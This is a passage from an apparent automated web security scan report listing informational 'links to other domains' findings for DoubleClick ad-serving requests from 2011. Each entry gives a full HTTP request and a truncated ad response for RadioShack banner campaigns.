GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
53850&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401740&migRandom=6953850&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740"></script>
...[SNIP]...

17.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.10

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:14:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5295

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
08100&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349"></script>
...[SNIP]...

17.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.5

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5221

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
32183&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch160x600.jpg" width="160" height="600" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40400763&migRandom=7532183&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40400763"></script>
...[SNIP]...

17.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.5

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:37 GMT
Expires: Sat, 29 Jan 2011 01:54:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
59045&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G160x600.jpg" width="160" height="600" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40401508&migRandom=4959045&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40401508"></script>
...[SNIP]...

17.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=78418826=_4d436479,7813775416,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=78418826/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=17382567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:51:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5221

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
48732&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=1148732&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 03:28:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5228

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
81109&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=2181109&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.19. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:32:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5225

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
03748&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=3603748&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.20. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 03:22:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5228

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
28609&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=1828609&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.21. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5221
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:37 GMT
Expires: Sat, 29 Jan 2011 01:54:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
58279&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=4958279&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

17.22. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 03:10:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5226

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
13140&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=1113140&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

17.23. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
